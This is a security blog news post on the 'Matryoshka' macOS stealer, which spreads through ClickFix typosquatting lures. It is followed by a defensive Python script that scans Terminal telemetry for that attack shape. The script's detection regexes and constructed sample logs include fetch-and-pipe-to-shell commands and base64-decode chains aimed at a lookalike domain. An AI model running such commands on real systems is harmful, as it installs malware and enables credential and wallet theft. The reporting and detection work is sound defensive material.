Cyber Web Spider Blog – News
Matryoshka Malware Targets macOS with New Stealer Variant

Posted on February 16, 2026 By CWS

A newly identified social engineering campaign is taking aim at macOS users, deploying a sophisticated stealer malware through an advanced form of the ClickFix attack. This strain, dubbed ‘Matryoshka’ after the Russian nesting dolls, employs layered obfuscation techniques to evade detection by security systems.

Innovative Attack Techniques

Matryoshka deceives users into running Terminal commands that mimic legitimate software repairs, effectively bypassing conventional security measures. By exploiting typosquatting domains, the attack ensnares users who mistype URLs, particularly those seeking software reviews. Victims redirected to these fraudulent sites are prompted to input a ‘fix’ command in their macOS Terminal.

Security analysts at Intego have tracked this malicious activity, noting the use of domains like comparisions[.]org, which closely resembles the legitimate comparisons.org through minor typographical changes.

Advanced Evasion Strategies

Unlike past ClickFix variants, Matryoshka utilizes sophisticated evasion techniques designed to thwart detection efforts. The malware’s payload remains encoded and compressed until execution, operating solely in memory. This strategy complicates file-based scans and static analysis, reducing the ability of researchers to identify the threat.

Upon execution, the loader accesses an AppleScript payload crafted to extract browser credentials and target cryptocurrency wallets such as Trezor Suite and Ledger Live. If direct credential theft is unsuccessful, the malware resorts to fake system prompts that persistently solicit passwords.

Infection Process and Mitigations

The infection chain of Matryoshka progresses through several phases, each engineered to avoid detection while ensuring the malware’s operational success. Victims executing the malicious Terminal command initiate a sequence that decodes and decompresses a hidden shell script, avoiding the creation of detectable file artifacts.

The malware employs several evasion tactics. It detaches its main process so that the visible command finishes quickly, leading users to believe the operation is complete. It suppresses terminal output and redirects the standard streams to minimize visible clues. Additionally, its command-and-control infrastructure demands specific request headers and answers requests without them with generic errors, misleading unauthorized scanners.

Users are advised against pasting commands from unverified sources into Terminal, as legitimate updates should not require such actions. Organizations should focus on blocking typosquatting domains, monitoring Terminal execution patterns, and scrutinizing any suspicious behavior related to cryptocurrency applications.
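The mitigations above (blocking typosquatting domains and monitoring Terminal execution patterns) can be turned into a simple triage pass over shell-command telemetry. The following is an added example written for this page, not code from Intego or from the article; the log format, the `LEGIT_DOMAINS` allowlist, the indicator names and the sample lines are all constructed. It flags URLs whose host is a near-miss of an allowlisted domain (the comparisions[.]org versus comparisons.org case from the article) and command shapes the article describes: a remote fetch piped into a shell, a decode-then-decompress chain, output redirected to `/dev/null`, and a process detached into the background.

```python
"""Defensive triage of shell-command telemetry for ClickFix-style Terminal abuse.

Two checks per logged command:
  1. typosquat lookalike domains in any URL found in the command
  2. command-shape indicators: remote fetch piped to a shell, decode+decompress
     chain, output suppression, and process detachment
All sample data below is constructed for this example; nothing is a real log.
"""

import re
from typing import Dict, List

# Hypothetical allowlist of domains users legitimately visit (constructed).
LEGIT_DOMAINS = ["comparisons.org", "github.com", "apple.com"]

# Indicator regexes; the names are this example's own labels, not vendor signatures.
INDICATORS = {
    "remote_fetch_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decode_then_decompress": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(gunzip|gzcat|zcat|xz\s+-d|tar\s+-?x)"),
    "output_suppressed": re.compile(r"(>\s*/dev/null\s*2>&1|&>\s*/dev/null|2>\s*/dev/null)"),
    "process_detached": re.compile(r"(\bnohup\b|\bdisown\b|&\s*$)"),
}

# Constructed telemetry line format: "<timestamp> user=<u> parent=<proc> cmd=<command>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; small enough to inline rather than pull a dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_matches(host: str, legit=LEGIT_DOMAINS, max_distance: int = 2) -> List[str]:
    """Allowlisted domains the host is a near-miss of; exact matches are not flagged."""
    host = host.lower().rstrip(".")
    return [d for d in legit if d != host and levenshtein(host, d) <= max_distance]


def command_indicators(cmd: str) -> List[str]:
    """Names of every indicator regex that matches the command text."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def triage(lines: List[str]) -> List[Dict]:
    """Return one alert per log line that trips at least one check."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line; skip rather than guess
        cmd = m.group("cmd")
        hits = command_indicators(cmd)
        lookalikes = {h: typosquat_matches(h) for h in URL_HOST.findall(cmd)}
        lookalikes = {h: v for h, v in lookalikes.items() if v}
        if not hits and not lookalikes:
            continue
        # An interactive Terminal parent plus a fetch-and-execute chain is the ClickFix shape,
        # so the parent process adds weight to the score.
        score = len(hits) + (2 if lookalikes else 0) + (1 if m.group("parent") == "Terminal" else 0)
        alerts.append({"ts": m.group("ts"), "user": m.group("user"), "indicators": hits,
                       "lookalike_domains": lookalikes, "score": score})
    return alerts


# Constructed telemetry (not real logs). The URL path and the base64 blob are placeholders.
SAMPLE_LOG = [
    "2026-02-16T10:01:02Z user=alice parent=Terminal cmd=brew upgrade",
    "2026-02-16T10:03:15Z user=alice parent=Terminal cmd=curl -fsSL https://comparisions.org/placeholder | sh",
    "2026-02-16T10:03:16Z user=alice parent=Terminal cmd=echo CONSTRUCTED_BLOB | base64 -D | gunzip | sh >/dev/null 2>&1 &",
    "2026-02-16T10:07:40Z user=bob parent=Terminal cmd=git clone https://github.com/example/repo",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Only the two constructed ClickFix-shaped lines produce alerts; `brew upgrade` and the `git clone` from an allowlisted host pass through untouched. The edit-distance threshold of 2 is a starting point, not a tuned value: a short allowlist keeps false positives low, and in practice the lookalike check belongs at the DNS or proxy layer as well as in endpoint triage.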

Tags: AppleScript, browser credentials, ClickFix, cryptocurrency theft, cyber attack, Cybersecurity, Intego, Ledger Live, macOS, Malware, Matryoshka, security evasion, social engineering, Terminal commands, Trezor Suite, typosquatting